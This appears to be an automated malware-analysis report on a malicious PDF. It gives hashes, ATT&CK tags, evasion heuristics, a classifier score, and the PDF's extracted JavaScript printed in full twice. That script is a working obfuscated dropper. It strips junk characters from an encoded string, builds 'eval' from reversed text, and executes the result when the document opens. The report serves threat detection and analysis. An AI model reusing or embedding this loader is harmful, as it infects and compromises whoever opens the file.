PDF malware analysis — malicious · 6d0d58da36271f83

MALICIOUS

PDF

7.3 KB Authoring application: Tooqimeqipigafara (via d200dRenizaxizo) First seen: 2026-05-09

MD5: fdf6ef512481a40cbc78c3fd680e192f SHA-1: faf7b375be8b789f0c0454474db3e76c4002cd50 SHA-256: 6d0d58da36271f834e685a2e826ba798e2c01e9d6b7417a5bc1a1e58e3b14a67

106 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains obfuscated JavaScript, indicated by the 'PDF_OBFUSCATED_NAME_OBJECT' and 'PDF_JAVASCRIPT' heuristics. The ML classifier also flagged it as malicious. The script appears to be designed to download and execute a second-stage payload, as suggested by the variable names and string concatenation patterns observed in the truncated script content. The obfuscation and the nature of the script strongly suggest malicious intent, likely delivered via spearphishing.

Machine Learning

Nyx PDF Classifier malicious score 0.9991

Heuristics 3

Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT

A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x130D 2214 bytes

Filename	Kind	Source	Size
`javascript_obj0010_000.js`	pdf-javascript-stream	PDF /JS object 10 at offset 0x130D	2214 bytes
SHA-256: `b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4`
Preview script First 1,000 lines of the extracted script var mXMB = null;try {var tIR=0;function x(hSL){this.tEP=hSL;};var jOZ="va!r% #skX8GkX$=!t$h$i~sk.9t#E\|P>;\|r#=$\'kg!e9t$PUa$g!e#N$\'\|;9b#QkZ\|=%r$+\|\'\|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d\|s\|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 \|285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'\|\'U;$t\|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=\|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V\|=~\'!l%ekn!g8t$h\|\'#;&z~G~L>S8=$\'%\\\|\\$x%\'~;%l\|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a\|rks~e$I\|n>t8\'\|;&t9C9P\|=!\'\|f%r\|o9m&C8h#a8r$Cko!dUe~\'~;~b9M\|Z#=k\'~ckhUa\|rkC#o9d#e$A#t8\'9;%q\|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'\|d\|o\|c~\'9;&v9I$X!=#3&3!2\|;%x&G#Fk=k[#]U;\|bkM8Xk=\|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=\|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X\|[\|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V\|=~t9I9R\|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G\|V~,&t&r#u%e%)%;~j~OUB>=\|[\|j&O>B$,UbkS\|N!]>[#x%I>D%]\|(!rUQkH!)~;&;9}$f\|o&r~(%j!GkV&=%08;Uj#G!V! \|<> ~j\|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{\|s9T\|C&L!=!j~O#B%[\|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r&E~F>=8p\|a9r%s!e~I\|n8t~(8s!T$C&L9,8f>G9L#)9;kf$I>H\|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr\|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W\|RU[\|x%M$V9]%=9=#q!F>M\|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W\|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R\|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 8S#t8r!iUn9g\|($z%GUL~S# >+$ 8x9G\|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X\|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;\|s\|XkG$XU.>x#Y%N!=U(>b9M9X8[\|z>A$T>]!(~b\|M\|X>[!x>MUVk]8-~v\|I#X$)9)%;\|sUX!G%X\|.$h8SUD\|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(\|)#;!}# %c8a!t!cUh8(>n&M~H$)~{\|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ \|{~a9p!p\|[%n#A%B~]\|(ks%X>G&X&.\|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;var v=this;var qFMN=2-1;var lSP=/[\>8%U&#\$~\\|\!k9]/g;function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}var tGB=new String("Fun"+"cti"+"on");var xMV="len"+"gth";;jOZ=jOZ.replace(lSP, '');nAB=zAL(String("lav"+"e"));nEX=zAL("epyt"+"otor"+"p");;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};var mXMB=new x(v);mXMB.fOF(tIR);} catch(bMX){}

SHA-256: b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4

Preview script

First 1,000 lines of the extracted script

var mXMB = null;try {var tIR=0;function x(hSL){this.tEP=hSL;};var jOZ="va!r% #skX8GkX$=!t$h$i~sk.9t#E|P>;|r#=$\'kg!e9t$PUa$g!e#N$\'|;9b#QkZ|=%r$+|\'|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d|s|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 |285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'|\'U;$t|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V|=~\'!l%ekn!g8t$h|\'#;&z~G~L>S8=$\'%\\|\\$x%\'~;%l|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a|rks~e$I|n>t8\'|;&t9C9P|=!\'|f%r|o9m&C8h#a8r$Cko!dUe~\'~;~b9M|Z#=k\'~ckhUa|rkC#o9d#e$A#t8\'9;%q|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'|d|o|c~\'9;&v9I$X!=#3&3!2|;%x&G#Fk=k[#]U;|bkM8Xk=|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X|[|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V|=~t9I9R|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G|V~,&t&r#u%e%)%;~j~OUB>=|[|j&O>B$,UbkS|N!]>[#x%I>D%]|(!rUQkH!)~;&;9}$f|o&r~(%j!GkV&=%08;Uj#G!V! |<> ~j|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{|s9T|C&L!=!j~O#B%[|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r&E~F>=8p|a9r%s!e~I|n8t~(8s!T$C&L9,8f>G9L#)9;kf$I>H|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W|RU[|x%M$V9]%=9=#q!F>M|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 8S#t8r!iUn9g|($z%GUL~S# >+$ 8x9G|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;|s|XkG$XU.>x#Y%N!=U(>b9M9X8[|z>A$T>]!(~b|M|X>[!x>MUVk]8-~v|I#X$)9)%;|sUX!G%X|.$h8SUD|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(|)#;!}# %c8a!t!cUh8(>n&M~H$)~{|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ |{~a9p!p|[%n#A%B~]|(ks%X>G&X&.|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;var v=this;var qFMN=2-1;var lSP=/[\>8%U&#\$~\|\!k9]/g;function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}var tGB=new String("Fun"+"cti"+"on");var xMV="len"+"gth";;jOZ=jOZ.replace(lSP, '');nAB=zAL(String("lav"+"e"));nEX=zAL("epyt"+"otor"+"p");;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};var mXMB=new x(v);mXMB.fOF(tIR);} catch(bMX){}

Open this report in the interactive analyzer, or submit your own file for analysis.